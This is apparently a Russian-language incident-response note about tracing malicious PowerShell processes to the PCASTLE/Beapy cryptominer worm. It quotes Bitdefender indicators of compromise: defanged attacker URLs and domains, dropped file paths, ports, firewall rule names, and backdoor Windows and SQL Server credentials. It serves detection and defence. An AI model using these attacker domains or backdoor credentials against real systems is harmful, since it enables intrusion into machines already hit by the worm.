родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline
поиск по известному cmdline позволил определить тип (Trojan.PS1.PCASTLE) и дополнительные детали вредоносного ПО, который распространился в сети: и
данные файлы были найдены в карантине антивируса:
детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender здесь
https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf
некоторые детали:
URLs used by updated worms for infection
http[:]//w.beahh.com/page.html
http[:]//v.beahh.com/
PowerShell URLs:
Note that these are URL fragments, and more information is usually encoded in the query string.
http[:]//v.y6h.net/g
http[:]//v.bddp.net/v
http[:]//v.bddp.net/wm
Domains
Some domains have many subdomains.
For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.
*.beahh[.]com
*.bddp[.]net
v.y6h[.]net
*.zer2[.]com
Scheduled task names:
\Microsoft\Windows\
Filenames:
%APPDATA%\sign.txt
%APPDATA%\flashplayer.tmp
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk
Listening ports:
65530
65531
65532
65533
TCP traffic on ports:
This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)
65530
65531
65532
65533
Firewall rules:
DNS (allow TCP port 65531)
DNSS2 (allow TCP port 65531)
DNS2 (allow TCP port 65532)
DNSsql (allow TCP port 65533)
DNSd (allow TCP port 65533)
DNSS3 (allow TCP port 65533)
User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”
SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)